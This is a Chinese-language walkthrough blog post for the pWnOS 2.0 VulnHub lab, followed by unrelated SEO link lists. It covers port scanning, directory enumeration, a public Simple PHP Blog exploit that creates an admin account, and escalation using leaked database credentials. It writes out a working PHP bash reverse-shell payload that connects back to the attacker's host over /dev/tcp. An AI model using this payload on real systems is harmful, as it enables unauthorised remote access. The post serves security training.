当前位置: 首页 > wzjs >正文

怎样在一个虚拟服务器里做两个网站厦门人才网个人会员

怎样在一个虚拟服务器里做两个网站,厦门人才网个人会员,wordpress部分密码,一级a做爰片无码网站文章目录 靶机地址主机发现、端口扫描web渗透目录探测漏洞利用权限提升 解密工具地址总结 靶机地址 https://download.vulnhub.com/pwnos/pWnOS_v2.0.7z 这里如果是windows系统直接使用vmware或者virtubox打开可以使用,如果是mac系统需再去做一个配置,比较麻烦 这里…

文章目录

  • 靶机地址
  • 主机发现、端口扫描
  • web渗透
    • 目录探测
    • 漏洞利用
    • 权限提升
  • 解密工具地址
  • 总结

靶机地址

https://download.vulnhub.com/pwnos/pWnOS_v2.0.7z

这里如果是windows系统直接使用vmware或者virtubox打开可以使用,如果是mac系统需再去做一个配置,比较麻烦

这里给一个参考地址:https://blog.csdn.net/qq_35664104/article/details/131757633

主机发现、端口扫描

han@Kali:~/RedTeam$ sudo arp-scan -l 
han@Kali:~/RedTeam$ sudo nmap -sn 192.168.100.0/24

在这里插入图片描述
通过主机发现扫描到了主机的ip地址,进一步进行端口扫描以及下一步的利用:


han@Kali:~/RedTeam/PWNOS:2.0$ sudo nmap --min-rate 10000 192.168.100.104 -p- #使用-p-扫描全端口,min-rate是扫描速率
han@Kali:~/RedTeam/PWNOS:2.0$ sudo nmap -sT -A -O -p22,80 192.168.100.104   #-sT是建立tcp扫描(全连接扫描) -A是全面扫描检测包括版本号,操作系统,同时还会利用脚本扫描 -O 是探测操作系统类型 -p时端口号
han@Kali:~/RedTeam/PWNOS:2.0$ sudo nmap -sU -p22,80 192.168.100.104  #-U参数是建立UDP扫描
han@Kali:~/RedTeam/PWNOS:2.0$ sudo nmap --script=vlun 192.168.100.104    #--script=vuln 使用脚本扫描用于常见的漏洞的探测

第一步扫描我们很清晰的看到有80端口和22端口
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
到这里我们可以清晰的看到,80端口给我们暴露的攻击面比22端口多,这里我们吧22端口的优先级排后,使用80尝试渗透

web渗透

目录探测

这里介绍3个工具的探测,其实web目录探测工具很多,根据自己的习惯来写就好了

han@Kali:~/RedTeam/PWNOS:2.0$ sudo gobuster dir -u http://192.168.100.104 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
han@Kali:~/RedTeam/PWNOS:2.0$ sudo dirsearch -u http://192.168.100.104
han@Kali:~/RedTeam/PWNOS:2.0$ sudo dirb http://192.168.100.104

这里也只是根据我自己的一些习惯给到的一些参数,这里可以根据自己的需求,结合ai等来做一些具体的配置更好的配合我们来做渗透测试

在这里插入图片描述

在这里插入图片描述
这里同理,对blog目录进行探测
在这里插入图片描述

http://192.168.100.104/blog/
http://192.168.100.104/blog/config
http://192.168.100.104/includes
http://192.168.100.104/index.php
http://192.168.100.104/login

漏洞利用


在这里尝试使用sql inject 但是…在这里插入图片描述在这里插入图片描述
到此好像这一个利用手法没有后续可以利用的点,所以这里准备换方法
这里我们看到了有blog的一个目录,还有一个登陆框
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这里也并没有可利用的,这里想到blog目录可能是一个cms,需要我们做一个信息收集

han@Kali:~/RedTeam/PWNOS:2.0$ whatweb http://192.168.100.104/blog

在这里插入图片描述
这里我们发现了是Simple PHP Blog 0.4.0 cms 所以这里可以尝试从这里入手

han@Kali:~/RedTeam/PWNOS:2.0$ searchsploit Simple PHP Blog 0.4.0

在这里插入图片描述
这里看到了有一个rb 一个pl可以使用

使用search -m 1191.pl将其下载到本地

在这里插入图片描述
这里给我们提示,需要加入地址和参数e,我们尝试构造

这里提到可以使用2来得到一个密码文件的hash值 使用3能创建一个用户密码,所以这里使用3来创建用户密码尝试看能不能使用login登陆框来登陆

han@Kali:~/RedTeam/PWNOS:2.0$ ./1191.pl -h http://192.168.100.104/blog -e 2

这里使用-h要加入url地址,并且使用/blog目录,起初在这里尝试了很多次都出现了问题,后来发现是必须使用/blog才能成功

han@Kali:~/RedTeam/PWNOS:2.0$ ./1191.pl -h http://192.168.100.104/blog -e 3 -U admin -P admin

在这里插入图片描述
这里提示我们设置了admin用户和admin密码,这里尝试使用登陆在这里插入图片描述
这是好事,登陆成功了,这里我们看到是有一个上传的接口,这也是好事!

han@Kali:~/RedTeam/PWNOS:2.0$ echo '<?php exec("/bin/bash -c '\''bash -i >& /dev/tcp/192.168.100.106/4444 0>&1'\''");?>' > reverse_shell.php                                                                                                                                                                     
han@Kali:~/RedTeam/PWNOS:2.0$ cat reverse_shell.php 

由于这里是使用echo来输入 ,所以需要使用转义符号来
在 Shell 中使用 单引号 包裹整个 PHP 内容,此时内部的单引号需要通过 ‘’’ 转义 转义之后才是我们的‘
因为这里存在上传点而且是php的环境,所以我们尝试使用php代码来执行反弹shell,这里还可以使用msf生成反弹shell上线msf,也可以使用webshell工具来执行,根据自己的需求,也根据环境的不同来选择

在这里插入图片描述

针对上面命令做一个简单的介绍:

<?php ?> 这里头的代码会被当作php语句而执行

exec()函数是php中用于执行系统命令的函数
/bin/bash -c 通过-c参数来执行后续的字符串命令
bash -i >& /dev/tcp/… 我们熟悉的反弹shell命令
bash -i 启动交互式的shell
/dev/tcp/是linux的特殊设备,用于建立TCP连接
>&是将标准输出和标准的错误重定向到TCP连接
0>&1 将标准输入重定向到标准输出,形成双向通信通道

上传反弹即可

han@Kali:~/RedTeam/PWNOS:2.0$ nc -lnvvp 4444

在这里插入图片描述
在这里插入图片描述

权限提升

这里可以看到已经得到shell,需要我们进一步进行提权了
在这里插入图片描述
非常好我们找到了一个有意义的文件

mysql连接的文件
root
goodday

在这里插入图片描述
这里就可以尝试登陆,mysql或者是使用22端口ssh登陆,这里就是可以想到的思路
在这里插入图片描述
在这里插入图片描述
但是非常遗憾,这里都不能登陆,思路再次断了

这里就只能做进一步的信息收集了

在这里插入图片描述

说来也巧,这里刚回退到上一个目录,又发现了一个mysql的连接文件

在这里插入图片描述

还是root,但是密码不同了
root
root@ISIntS

尝试登陆

非常好,使用root@ISIntS 这个密码直接登陆成功了,还是root权限

这里其实我想到,既然有数据库连接文件,就应该是和数据库有什么关系,所以这里就又进行了一些信息收集

在这里插入图片描述
但是这里卡着没反应了

当时 的第一反应我以为是密码错了,可是后来一直卡着没反应,没办法只好重新反弹,我突然想到会不会是终端不友好的问题,所以我尝试使用了python来启动一个交互好点的终端

在这里插入图片描述
这是好事,可以使用python起一个终端

www-data@web:/var/www/blog/images$ python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

这里和我们想的是一样的

在数据库中给你做一波信息收集

mysql> show databases;
mysql> use ch16;
mysql> select * from users;

在这里插入图片描述

这里得到了一个用户Dan的密码c2c4b4e51d9e23c02c15702c136c3e950ba9a4af

han@Kali:~/RedTeam/PWNOS:2.0$ hash-identifier 'c2c4b4e51d9e23c02c15702c136c3e950ba9a4af'

使用hash-identifier来识别一下hash值是哪种加密类型,方便我们去判断如何解密

在这里插入图片描述
这里是sha-1加密类型,这里需要使用工具来尝试了

解密工具地址

https://www.somd5.com/

在这里插入图片描述

成功得到密码:killerbeesareflying

尝试登陆ssh

在这里插入图片描述

很遗憾这里登录不成功

看来这里就只有通过root直接登陆,而dan用户没有更多的后续了,那就到此为止了!

总结

整体来说,就是要有一个渗透测试思路,最重要的还是思路,需要我们多多重复多多练习才有思路,文章只做技术交流,希望对各位有帮助!

http://www.dtcms.com/wzjs/418125.html

相关文章:

  • 上海城隍庙门票多少钱一张做seo排名好的公司
  • 做唯品客网站的感想网站综合排名信息查询
  • 网站开发后端语言有哪些seo是什么意思的缩写
  • 外贸网站如何做推广网页代码大全
  • mip织梦手机网站模板电脑培训学校哪家最好
  • 济南招考院网站推广员是做什么的
  • 商务网站建设流程步骤steam交易链接怎么获取
  • 品牌活动策划方案深圳优化公司
  • 新电商平台如何推广抖音搜索seo代理
  • 二手房交易网站排名做app软件大概多少钱
  • 怎样做论坛网站网络推广的途径有哪些
  • 韩雪个人网站市场营销证书含金量
  • 网站的关键词排名靠前百度移动端排名软件
  • 建湖住房和城乡建设局网站西地那非能提高硬度吗
  • wordpress feed北京搜索引擎关键词优化
  • 做网站要学多久网络优化的工作内容
  • 网站地图有哪些网址站长工具是干嘛的
  • 做电商网站用什么软件性价比高的seo网站优化
  • 石家庄做网站seo线上推广策划方案范文
  • 电影网站做淘客网站快速收录的方法
  • 做的网站程序防止倒卖代运营
  • wordpress qtan优化网站排名
  • 电子商务网站自助建站注册公司网站
  • 高清素材图片的网站北京网站优化服务
  • 网站建设 规范武汉seo排名扣费
  • 淘宝客网站程序购米百度竞价推广怎么做效果好
  • 阿里巴巴免费做国际网站nba西部最新排名
  • 毕业设计做系统网站好商务软文写作300字
  • 企业所得税怎么算2023年推广优化工具
  • 网站建设哪家服务好网络推广方案范例